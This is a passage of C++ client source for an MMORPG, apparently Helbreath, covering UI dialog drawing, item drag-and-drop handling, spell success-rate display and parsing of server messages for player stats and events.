			else if (cCollison == DEF_EQUIPPOS_ARMS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_PANTS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BACK)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 45, sY + 143, sFrame, m_dwCurTime);
		}
	}

	// v2.05
	if ((msX >= sX + 15) && (msX <= sX + 15 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY))
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 15, sY + 340, 5, FALSE, m_bDialogTrans);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 15, sY + 340, 4, FALSE, m_bDialogTrans);

	if ((msX >= sX + 98) && (msX <= sX + 98 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY))
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 98, sY + 340, 45, FALSE, m_bDialogTrans);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 98, sY + 340, 44, FALSE, m_bDialogTrans);

	if ((msX >= sX + 180) && (msX <= sX + 180 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY))
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 180, sY + 340, 11, FALSE, m_bDialogTrans);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + 180, sY + 340, 10, FALSE, m_bDialogTrans);
}

BOOL CGame::_bCheckDraggingItemRelease(short msX, short msY)
{
	int i;
	char         cDlgID;
	int resi = 0, resx;
#ifdef RES_HIGH
	resi = 120;
	resx = 80;
#else
	resi = 0;
#endif

	if ((435 + resi < msY) && (475 + resi > msY)) //LifeX Check
	{ // MORLA - cuando suelta el item en la bar cast
		if ((263 + resx <= msX) && (303 + resx >= msX)) 
		{	 // 1
			m_sRecentShortCut = m_stMCursor.sSelectedObjectID;
			UseShortCutPanel(3, true);
			iBarCast1 = m_stMCursor.sSelectedObjectID;
			bBarCast1 = 0;
			PlaySound('E', 28, 5);
		}

		if ((306 + resx <= msX) && (346 + resx >= msX)) { // 2
			m_sRecentShortCut = m_stMCursor.sSelectedObjectID;
			UseShortCutPanel(4, true);
			iBarCast2 = m_stMCursor.sSelectedObjectID;
			bBarCast2 = 0;
			PlaySound('E', 28, 5);
		}

		if ((348 + resx <= msX) && (388 + resx >= msX)) { // 3
			m_sRecentShortCut = m_stMCursor.sSelectedObjectID;
			UseShortCutPanel(5, true);
			iBarCast3 = m_stMCursor.sSelectedObjectID;
			bBarCast3 = 0;
			PlaySound('E', 28, 5);
		}
		if ((390 + resx <= msX) && (430 + resx >= msX)) { // 4
			m_sRecentShortCut = m_stMCursor.sSelectedObjectID;
			UseShortCutPanel(6, true);
			iBarCast4 = m_stMCursor.sSelectedObjectID;
			bBarCast4 = 0;
			PlaySound('E', 28, 5);
		}
		if ((433 + resx <= msX) && (473 + resx >= msX)) { // 5
			m_sRecentShortCut = m_stMCursor.sSelectedObjectID;
			UseShortCutPanel(7, true);
			iBarCast5 = m_stMCursor.sSelectedObjectID;
			bBarCast5 = 0;
			PlaySound('E', 28, 5);
		}
	}

	else
	{
		//Snoopy: 41->61
		for (i = 0; i < 61; i++)
			//Snoopy: 40->60
			if (m_cDialogBoxOrder[60 - i] != NULL) {
				//Snoopy: 40->60
				cDlgID = m_cDialogBoxOrder[60 - i];
				if ((m_stDialogBoxInfo[cDlgID].sX < msX) && ((m_stDialogBoxInfo[cDlgID].sX + m_stDialogBoxInfo[cDlgID].sSizeX) > msX)
					&& (m_stDialogBoxInfo[cDlgID].sY < msY) && ((m_stDialogBoxInfo[cDlgID].sY + m_stDialogBoxInfo[cDlgID].sSizeY) > msY))
				{
					EnableDialogBox(cDlgID, NULL, NULL, NULL);
					switch (cDlgID) {
					case 1:
						bItemDrop_Character();
						break;

					case 2:
						bItemDrop_Inventory(msX, msY);
						break;

					case 14:
						bItemDrop_Bank(msX, msY);
						break;

					case 26: // Alchim / Manuf
						bItemDrop_SkillDialog();
						break;

					case 27:
						bItemDrop_ExchangeDialog(msX, msY);
						break;

					case 30:
						bItemDrop_IconPannel(msX, msY);
						break;

					case 31:
						bItemDrop_SellList(msX, msY);
						break;

					case 34:
						bItemDrop_ItemUpgrade();
						break;

					case 40:
						bItemDrop_Slates();
						break;
					}
					return TRUE;
				}
			}
		bItemDrop_ExternalScreen((char)m_stMCursor.sSelectedObjectID, msX, msY);
	}
	return FALSE;
}

void CGame::bItemDrop_ExternalScreen(char cItemID, short msX, short msY)
{
	char  cName[21];
	short sType, tX, tY;
	int iStatus;

	if (bCheckItemOperationEnabled(cItemID) == FALSE) return;

	if ((m_sMCX != 0) && (m_sMCY != 0) && (abs(m_sPlayerX - m_sMCX) <= 8) && (abs(m_sPlayerY - m_sMCY) <= 8))
	{
		ZeroMemory(cName, sizeof(cName));
		m_pMapData->bGetOwner(m_sMCX, m_sMCY, cName, &sType, &iStatus, &m_wCommObjectID);
		if (memcmp(m_cPlayerName, cName, 10) == 0)
		{
		}
		else
		{
			if (((m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_CONSUME) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW))
				&& (m_pItemList[cItemID]->m_dwCount > 1))
			{
				m_stDialogBoxInfo[17].sX = msX - 140;
				m_stDialogBoxInfo[17].sY = msY - 70;
				if (m_stDialogBoxInfo[17].sY < 0) m_stDialogBoxInfo[17].sY = 0;
				m_stDialogBoxInfo[17].sV1 = m_sMCX;
				m_stDialogBoxInfo[17].sV2 = m_sMCY;
				m_stDialogBoxInfo[17].sV3 = sType;
				m_stDialogBoxInfo[17].sV4 = m_wCommObjectID;
				ZeroMemory(m_stDialogBoxInfo[17].cStr, sizeof(m_stDialogBoxInfo[17].cStr));
				if (sType < 10)
					memcpy(m_stDialogBoxInfo[17].cStr, cName, 10);
				else
				{
					GetNpcName(sType, m_stDialogBoxInfo[17].cStr);
				}
				EnableDialogBox(17, cItemID, m_pItemList[cItemID]->m_dwCount, NULL);
			}
			else
			{
				switch (sType) {
				case 1:
				case 2:
				case 3:
				case 4:
				case 5:
				case 6:
					EnableDialogBox(20, 1, cItemID, sType);
					m_stDialogBoxInfo[20].sV3 = 1;
					m_stDialogBoxInfo[20].sV4 = m_wCommObjectID;
					m_stDialogBoxInfo[20].sV5 = m_sMCX;
					m_stDialogBoxInfo[20].sV6 = m_sMCY;

					tX = msX - 117;
					tY = msY - 50;
					if (tX < 0) tX = 0;
#ifdef RES_HIGH
					if ((tX + 235) > 800) tX = 800 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 600) tY = 600 - 100;
#else
					if ((tX + 235) > 639) tX = 639 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 479) tY = 479 - 100;
#endif
					m_stDialogBoxInfo[20].sX = tX;
					m_stDialogBoxInfo[20].sY = tY;

					ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
					strcpy(m_stDialogBoxInfo[20].cStr, cName);
					break;

				case 20: // Howard
					EnableDialogBox(20, 3, cItemID, sType);
					m_stDialogBoxInfo[20].sV3 = 1;
					m_stDialogBoxInfo[20].sV4 = m_wCommObjectID; // v1.4
					m_stDialogBoxInfo[20].sV5 = m_sMCX;
					m_stDialogBoxInfo[20].sV6 = m_sMCY;

					tX = msX - 117;
					tY = msY - 50;
					if (tX < 0) tX = 0;
#ifdef RES_HIGH
					if ((tX + 235) > 800) tX = 800 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 600) tY = 600 - 100;
#else
					if ((tX + 235) > 639) tX = 639 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 479) tY = 479 - 100;
#endif
					m_stDialogBoxInfo[20].sX = tX;
					m_stDialogBoxInfo[20].sY = tY;

					ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
					GetNpcName(sType, m_stDialogBoxInfo[20].cStr);
					break;

				case 15: // ShopKeeper-W
				case 24: // Tom
					EnableDialogBox(20, 2, cItemID, sType);
					m_stDialogBoxInfo[20].sV3 = 1;
					m_stDialogBoxInfo[20].sV4 = m_wCommObjectID; // v1.4
					m_stDialogBoxInfo[20].sV5 = m_sMCX;
					m_stDialogBoxInfo[20].sV6 = m_sMCY;

					tX = msX - 117;
					tY = msY - 50;
					if (tX < 0) tX = 0;
#ifdef RES_HIGH
					if ((tX + 235) > 800) tX = 800 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 600) tY = 600 - 100;
#else
					if ((tX + 235) > 639) tX = 639 - 235;
					if (tY < 0) tY = 0;
					if ((tY + 100) > 479) tY = 479 - 100;
#endif
					m_stDialogBoxInfo[20].sX = tX;
					m_stDialogBoxInfo[20].sY = tY;

					ZeroMemory(m_stDialogBoxInfo[20].cStr, sizeof(m_stDialogBoxInfo[20].cStr));
					GetNpcName(sType, m_stDialogBoxInfo[20].cStr);
					break;

				default:
					bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_GIVEITEMTOCHAR, cItemID, 1, m_sMCX, m_sMCY, m_pItemList[cItemID]->m_cName);
					break;
				}
			}
			m_bIsItemDisabled[cItemID] = TRUE;
		}
	}
	else
	{
		if (((m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_CONSUME) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW))
			&& (m_pItemList[cItemID]->m_dwCount > 1))
		{
			m_stDialogBoxInfo[17].sX = msX - 140;
			m_stDialogBoxInfo[17].sY = msY - 70;
			if (m_stDialogBoxInfo[17].sY < 0)		m_stDialogBoxInfo[17].sY = 0;
			m_stDialogBoxInfo[17].sV1 = NULL;
			m_stDialogBoxInfo[17].sV2 = NULL;
			m_stDialogBoxInfo[17].sV3 = NULL;
			m_stDialogBoxInfo[17].sV4 = NULL;
			ZeroMemory(m_stDialogBoxInfo[17].cStr, sizeof(m_stDialogBoxInfo[17].cStr));
			EnableDialogBox(17, cItemID, m_pItemList[cItemID]->m_dwCount, NULL);
		}
		else
		{
			if (_ItemDropHistory(m_pItemList[cItemID]->m_cName))
			{
				m_stDialogBoxInfo[4].sX = msX - 140;
				m_stDialogBoxInfo[4].sY = msY - 70;
				if (m_stDialogBoxInfo[4].sY < 0)	m_stDialogBoxInfo[4].sY = 0;
				m_stDialogBoxInfo[4].sV1 = NULL;
				m_stDialogBoxInfo[4].sV2 = NULL;
				m_stDialogBoxInfo[4].sV3 = 1;
				m_stDialogBoxInfo[4].sV4 = NULL;
				m_stDialogBoxInfo[4].sV5 = cItemID;
				ZeroMemory(m_stDialogBoxInfo[4].cStr, sizeof(m_stDialogBoxInfo[4].cStr));
				EnableDialogBox(4, cItemID, m_pItemList[cItemID]->m_dwCount, NULL);
			}
			else
			{
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_ITEMDROP, NULL, cItemID, 1, NULL, m_pItemList[cItemID]->m_cName);
			}
		}
		m_bIsItemDisabled[cItemID] = TRUE;
	}
}

int  _tmp_iMCProb[] = { 0, 300, 250, 200, 150, 100, 80, 70, 60, 50, 40 };
int  _tmp_iMLevelPenalty[] = { 0, 5, 5, 8, 8, 10, 14, 28, 32, 36, 40 };

void CGame::DrawDialogBox_Magic(short msX, short msY, short msZ)
{
	short sX, sY, sMagicCircle, sLevelMagic;
	int  iCPivot, i, iYloc, iResult, iManaCost;
	char cTxt[120], cMana[10];
	DWORD dwTime = m_dwCurTime;
	double dV1, dV2, dV3, dV4;

	sX = m_stDialogBoxInfo[3].sX;
	sY = m_stDialogBoxInfo[3].sY;

	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME1, sX, sY, 1, FALSE, m_bDialogTrans);
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_TEXT, sX, sY, 7, FALSE, m_bDialogTrans);

	if (iGetTopDialogBoxIndex() == 3 && msZ != 0)
	{
		if (msZ > 0) m_stDialogBoxInfo[3].sView--;
		if (msZ < 0) m_stDialogBoxInfo[3].sView++;
		m_DInput.m_sZ = 0;
	}
	if (m_stDialogBoxInfo[3].sView < 0) m_stDialogBoxInfo[3].sView = 9;
	if (m_stDialogBoxInfo[3].sView > 9) m_stDialogBoxInfo[3].sView = 0;

	//Circle
	ZeroMemory(cTxt, sizeof(cTxt));
	switch (m_stDialogBoxInfo[3].sView) {
	case 0: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC1);  break;//"Circle One"
	case 1: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC2);  break;//"Circle Two"
	case 2: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC3);  break;//"Circle Three"
	case 3: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC4);  break;//"Circle Four"
	case 4: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC5);  break;//"Circle Five"
	case 5: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC6);  break;//"Circle Six"
	case 6: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC7);  break;//"Circle Seven"
	case 7: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC8);  break;//"Circle Eight"
	case 8: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC9);  break;//"Circle Nine"
	case 9: strcpy(cTxt, DRAW_DIALOGBOX_MAGIC10); break;//"Circle Ten"
	}
	PutAlignedString(sX + 3, sX + 256, sY + 50, cTxt);
	PutAlignedString(sX + 4, sX + 257, sY + 50, cTxt);
	iCPivot = m_stDialogBoxInfo[3].sView * 10;
	iYloc = 0;

	for (i = 0; i < 9; i++) {
		if ((m_cMagicMastery[iCPivot + i] != NULL) && (m_pMagicCfgList[iCPivot + i] != NULL)) {
			wsprintf(cTxt, "%s", m_pMagicCfgList[iCPivot + i]->m_cName);

			m_Misc.ReplaceString(cTxt, '-', ' ');
			iManaCost = iGetManaCost(iCPivot + i);
			if (iManaCost > m_iMP)
			{
				if (m_Misc.bCheckIMEString(cTxt) == FALSE)
				{
					PutString(sX + 30, sY + 73 + iYloc, cTxt, RGB(41, 16, 41));
					PutString(sX + 31, sY + 73 + iYloc, cTxt, RGB(41, 16, 41));
				}
				else PutString_SprFont(sX + 30, sY + 70 + iYloc, cTxt, 5, 5, 5);
				wsprintf(cMana, "%3d", iManaCost);
				PutString_SprFont(sX + 206, sY + 70 + iYloc, cMana, 5, 5, 5);
			}
			else
				if ((msX >= sX + 30) && (msX <= sX + 240) && (msY >= sY + 70 + iYloc) && (msY <= sY + 70 + 14 + iYloc))
				{
					if (m_Misc.bCheckIMEString(cTxt) == FALSE)
					{
						PutString(sX + 30, sY + 73 + iYloc, cTxt, RGB(255, 255, 255));
						PutString(sX + 31, sY + 73 + iYloc, cTxt, RGB(255, 255, 255));
					}
					else PutString_SprFont(sX + 30, sY + 70 + iYloc, cTxt, 250, 250, 250);
					wsprintf(cMana, "%3d", iManaCost);
					PutString_SprFont(sX + 206, sY + 70 + iYloc, cMana, 250, 250, 250);
				}
				else
				{
					if (m_Misc.bCheckIMEString(cTxt) == FALSE)
					{
						PutString(sX + 30, sY + 73 + iYloc, cTxt, RGB(8, 0, 66));
						PutString(sX + 31, sY + 73 + iYloc, cTxt, RGB(8, 0, 66));
					}
					else PutString_SprFont(sX + 30, sY + 70 + iYloc, cTxt, 1, 1, 8);
					wsprintf(cMana, "%3d", iManaCost);
					PutString_SprFont(sX + 206, sY + 70 + iYloc, cMana, 1, 1, 8);
				}

			iYloc += 18;
		}

	}

	if (iYloc == 0) {
		PutAlignedString(sX + 3, sX + 256, sY + 100, DRAW_DIALOGBOX_MAGIC11);//"
		PutAlignedString(sX + 3, sX + 256, sY + 115, DRAW_DIALOGBOX_MAGIC12);//"
		PutAlignedString(sX + 3, sX + 256, sY + 130, DRAW_DIALOGBOX_MAGIC13);//"
		PutAlignedString(sX + 3, sX + 256, sY + 145, DRAW_DIALOGBOX_MAGIC14);//"
		PutAlignedString(sX + 3, sX + 256, sY + 160, DRAW_DIALOGBOX_MAGIC15);//"
	}

	m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 30, sY + 250, 19, dwTime);

	switch (m_stDialogBoxInfo[3].sView) {
	case 0: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 30, sY + 250, 20, dwTime); break;
	case 1: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 43, sY + 250, 21, dwTime); break;
	case 2: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 61, sY + 250, 22, dwTime); break;
	case 3: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 86, sY + 250, 23, dwTime); break;
	case 4: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 106, sY + 250, 24, dwTime); break;
	case 5: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 121, sY + 250, 25, dwTime); break;
	case 6: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 142, sY + 250, 26, dwTime); break;
	case 7: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 169, sY + 250, 27, dwTime); break;
	case 8: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 202, sY + 250, 28, dwTime); break;
	case 9: m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS]->PutSpriteFast(sX + 222, sY + 250, 29, dwTime); break;
	}

	sMagicCircle = m_stDialogBoxInfo[3].sView + 1;
	if (m_cSkillMastery[4] == 0)
		dV1 = 1.0f;
	else dV1 = (double)m_cSkillMastery[4];
	dV2 = (double)(dV1 / 100.0f);
	dV3 = (double)_tmp_iMCProb[sMagicCircle];
	dV1 = dV2 * dV3;
	iResult = (int)dV1;
	if ((m_iInt + m_iAngelicInt) > 50) iResult += (((m_iInt + m_iAngelicInt) - 50) / 2);
	sLevelMagic = ((m_iLevel + m_iMajesticLevel) / 10);
	if (sMagicCircle != sLevelMagic)
	{
		if (sMagicCircle > sLevelMagic)
		{
			dV1 = (double)((m_iLevel + m_iMajesticLevel) - sLevelMagic * 10);
			dV2 = (double)abs(sMagicCircle - sLevelMagic)*_tmp_iMLevelPenalty[sMagicCircle];
			dV3 = (double)abs(sMagicCircle - sLevelMagic) * 10;
			dV4 = (dV1 / dV3)*dV2;
			iResult -= abs(abs(sMagicCircle - sLevelMagic)*_tmp_iMLevelPenalty[sMagicCircle] - (int)dV4);
		}
		else
		{
			iResult += 5 * abs(sMagicCircle - sLevelMagic);
		}
	}

	switch (m_cWhetherStatus) {
	case 0: break;
	case 1: iResult = iResult - (iResult / 24); break;
	case 2:	iResult = iResult - (iResult / 12); break;
	case 3: iResult = iResult - (iResult / 5);  break;
	}
	for (i = 0; i<DEF_MAXITEMS; i++)
	{
		if (m_pItemList[i] == NULL) continue;
		if (m_bIsItemEquipped[i] == TRUE)
		{
			if (((m_pItemList[i]->m_dwAttribute & 0x00F00000) >> 20) == 10)
			{
				dV1 = (double)iResult;
				dV2 = (double)(((m_pItemList[i]->m_dwAttribute & 0x000F0000) >> 16) * 3);
				dV3 = dV1 + dV2;
				iResult = (int)dV3;
				break;
			}
		}
	}

	if (iResult > 100) iResult = 100;
	if (m_iSP < 1) iResult = iResult * 9 / 10;
	if (iResult < 1) iResult = 1;

	ZeroMemory(cTxt, sizeof(cTxt));
	wsprintf(cTxt, DRAW_DIALOGBOX_MAGIC16, iResult);//"
	PutAlignedString(sX, sX + 256, sY + 267, cTxt);
	PutAlignedString(sX + 1, sX + 257, sY + 267, cTxt);

	// v2.15
	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + 285) && (msY <= sY + 285 + DEF_BTNSZY))
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + 285, 49, FALSE, m_bDialogTrans);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, sX + DEF_RBTNPOSX, sY + 285, 48, FALSE, m_bDialogTrans);
}

void CGame::NotifyMsg_EnemyKillReward(char *pData)
{
	DWORD * dwp;
	short * sp, sGuildRank;
	char  * cp, cName[12], cGuildName[24], cTxt[120];
	int   iEnemyKillCount, iWarContribution;
	int i;
	unsigned long iExp;

	ZeroMemory(cName, sizeof(cName));
	ZeroMemory(cGuildName, sizeof(cGuildName));
	ZeroMemory(cEKNotifySubject, sizeof(cEKNotifySubject)); // VAMP
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	dwp = (DWORD *)cp;
	iExp = *dwp;
	cp += 4;

	dwp = (DWORD *)cp;
	iEnemyKillCount = *dwp;
	cp += 4;

	dwp = (DWORD *)cp;
	m_iMaxEK = *dwp;
	cp += 4;

	memcpy(cName, cp, 10);
	cp += 10;
	memcpy(cGuildName, cp, 20);
	cp += 20;
	sp = (short *)cp;
	sGuildRank = *sp;
	cp += 2;
	sp = (short *)cp;
	iWarContribution = *sp;
	cp += 2;
	if (iWarContribution > m_iWarContribution)
	{
		wsprintf(G_cTxt, "%s +%d!", m_pGameMsgList[21]->m_pMsg, iWarContribution - m_iWarContribution);
		SetTopMsg(G_cTxt, 5);
	}
	m_iWarContribution = iWarContribution;
	if (strcmp(m_cPlayerName, cName) != 0)
	{
		if (sGuildRank == -1)
		{
			wsprintf(cTxt, NOTIFYMSG_ENEMYKILL_REWARD1, cName);
			AddEventList(cTxt, 10);
		}
		else
		{
			wsprintf(cTxt, NOTIFYMSG_ENEMYKILL_REWARD2, cName, cGuildName); // Fixed by Snoopy         
			AddEventList(cTxt, 10);
		}
		if (m_iEnemyKillCount != iEnemyKillCount)
		{
			if (m_iEnemyKillCount > iEnemyKillCount)
			{
				wsprintf(cTxt, NOTIFYMSG_ENEMYKILL_REWARD5, m_iEnemyKillCount - iEnemyKillCount);
				AddEventList(cTxt, 10);
			}
			else
			{
				wsprintf(cTxt, NOTIFYMSG_ENEMYKILL_REWARD6, iEnemyKillCount - m_iEnemyKillCount);
				AddEventList(cTxt, 10);
			}
		}
		// VAMP
		wsprintf(cEKNotifySubject, "%s (%s)", cName, cGuildName);
		dwEKNotifyTime = m_dwCurTime;
		if (iExp >= 0) m_iExp = iExp;
	}
	if (iEnemyKillCount >= 0) m_iEnemyKillCount = iEnemyKillCount;
	PlaySound('E', 23, 0);
	CreateScreenShot();
}

void CGame::NotifyMsg_ForceDisconn(char *pData)
{
	WORD * wpCount;
	wpCount = (WORD *)(pData + 6);
	m_bForceDisconn = TRUE;
	if (m_bIsProgramActive)
	{
		if (m_cLogOutCount < 0 || m_cLogOutCount > 10) m_cLogOutCount = 10;
		AddEventList(NOTIFYMSG_FORCE_DISCONN1, 10);
	}
	else
	{
		delete m_pGSock;
		m_pGSock = NULL;
		m_bEscPressed = FALSE;
		if (m_bSoundFlag) m_pESound[38]->bStop();
		if ((m_bSoundFlag) && (m_bMusicStat == TRUE))
		{
			StopBGM();	// Snoopy: mp3 support
			if (m_pBGM != NULL) m_pBGM->bStop();
		}
		if (strlen(G_cCmdLineTokenA) != 0)
			ChangeGameMode(DEF_GAMEMODE_ONQUIT);
		else ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
	}
}

void CGame::NotifyMsg_Hunger(char * pData)
{
	char * cp, cHLv;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	cHLv = *cp;
	// centuu
	iHungerStatus = cHLv;
	if ((iHungerStatus >= 100) || (iHungerStatus<0))
		iHungerStatus = 100;

	if ((cHLv <= 40) && (cHLv > 30)) AddEnergyList(NOTIFYMSG_HUNGER1, 2);//"
	if ((cHLv <= 25) && (cHLv > 20)) AddEnergyList(NOTIFYMSG_HUNGER2, 2);//"
	if ((cHLv <= 20) && (cHLv > 15)) AddEnergyList(NOTIFYMSG_HUNGER3, 2);//"
	if ((cHLv <= 15) && (cHLv > 10)) AddEnergyList(NOTIFYMSG_HUNGER4, 2);//"
	if ((cHLv <= 10) && (cHLv >= 0)) AddEnergyList(NOTIFYMSG_HUNGER5, 11);//"
}


void CGame::RequestFullObjectData(WORD wObjectID)
{
	char    cMsg[256];
	int     iRet;
	DWORD * dwp;
	WORD  * wp;

	ZeroMemory(cMsg, sizeof(cMsg));

	dwp = (DWORD *)(cMsg + DEF_INDEX4_MSGID);
	*dwp = MSGID_REQUEST_FULLOBJECTDATA;
	wp = (WORD *)(cMsg + DEF_INDEX2_MSGTYPE);
	*wp = wObjectID;

	iRet = m_pGSock->iSendMsg((char *)cMsg, 6);

	switch (iRet) {
	case DEF_XSOCKEVENT_SOCKETCLOSED:
	case DEF_XSOCKEVENT_SOCKETERROR:
	case DEF_XSOCKEVENT_QUENEFULL:
		ChangeGameMode(DEF_GAMEMODE_ONCONNECTIONLOST);
		delete m_pGSock;
		m_pGSock = NULL;
		break;

	case DEF_XSOCKEVENT_CRITICALERROR:
		delete m_pGSock;
		m_pGSock = NULL;

		if (G_pCalcSocket != NULL) {
			delete G_pCalcSocket;
			G_pCalcSocket = NULL;
		}
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		break;
	}
}

void CGame::CommonEventHandler(char * pData)
{
 WORD * wp, wEventType;
 short * sp, sX, sY, sV1, sV2, sV3, sV4;
 char * cp;

	wp   = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	wEventType = *wp;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	sp  = (short *)cp;
	sX  = *sp;
	cp += 2;

	sp  = (short *)cp;
	sY  = *sp;
	cp += 2;

	sp  = (short *)cp;
	sV1 = *sp;
	cp += 2;

	sp  = (short *)cp;
	sV2 = *sp;
	cp += 2;

	sp  = (short *)cp;
	sV3 = *sp;
	cp += 2;

	sp  = (short *)cp;
	sV4 = *sp;
	cp += 2;

	switch (wEventType) {
	case DEF_COMMONTYPE_ITEMDROP:
		if ((sV1 == 6) && (sV2 == 0)) {
			bAddNewEffect(4, sX, sY, NULL, NULL, 0);
		}
		m_pMapData->bSetItem(sX, sY, sV1, sV2, (char)sV3);
		break;

	case DEF_COMMONTYPE_SETITEM:
		m_pMapData->bSetItem(sX, sY, sV1, sV2, (char)sV3, FALSE); // v1.4 color
		break;

	case DEF_COMMONTYPE_MAGIC:
		bAddNewEffect(sV3, sX, sY, sV1, sV2, 0, sV4);
		break;

	case DEF_COMMONTYPE_CLEARGUILDNAME:
		ClearGuildNameList();
		break;
	}
}

void CGame::InitPlayerCharacteristics(char * pData)
{int  * ip;
 char * cp;
 WORD * wp;
	// Snoopy: Angels
	m_iAngelicStr = 0;
	m_iAngelicDex = 0;
	m_iAngelicInt = 0;
	m_iAngelicMag = 0;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	ip   = (int *)cp;
	m_iHP = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iMP = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iSP = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iAC = *ip;		// m_iDefenseRatio
	cp += 4;
	ip   = (int *)cp;
	m_iTHAC0 = *ip;    // m_iHitRatio
	cp += 4;
	ip   = (int *)cp;
	m_iLevel = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iStr = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iInt = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iVit = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iDex = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iMag = *ip;
	cp += 4;
	ip   = (int *)cp;
	m_iCharisma = *ip;
	cp += 4;

	// CLEROTH - LU
	wp = (WORD *)cp;
	m_iLU_Point = *wp - 3;
	cp += 7; // 2 + 5

	ip   = (int *)cp;
	m_iExp = *ip;
	cp += 4;

	ip   = (int *)cp;
	m_iEnemyKillCount = *ip;
	cp += 4;

	ip   = (int *)cp;
	m_iMaxEK = *ip;
	cp += 4;

	ip   = (int *)cp;
	m_iPKCount = *ip;
	cp += 4;

	ip   = (int *)cp;
	m_iRewardGold = *ip;
	cp += 4;

	memcpy(m_cLocation, cp, 10);
	cp += 10;
	if (memcmp(m_cLocation, "aresden", 7) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else if (memcmp(m_cLocation, "elvine", 6) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else
	{	m_bAresden = TRUE;
		m_bCitizen = FALSE;
		m_bHunter  = TRUE;
	}

	cp = (char *)cp;
	memcpy(m_cGuildName, cp, 20);
	cp += 20;

	if (strcmp(m_cGuildName, "NONE") == 0)
		ZeroMemory(m_cGuildName, sizeof(m_cGuildName));

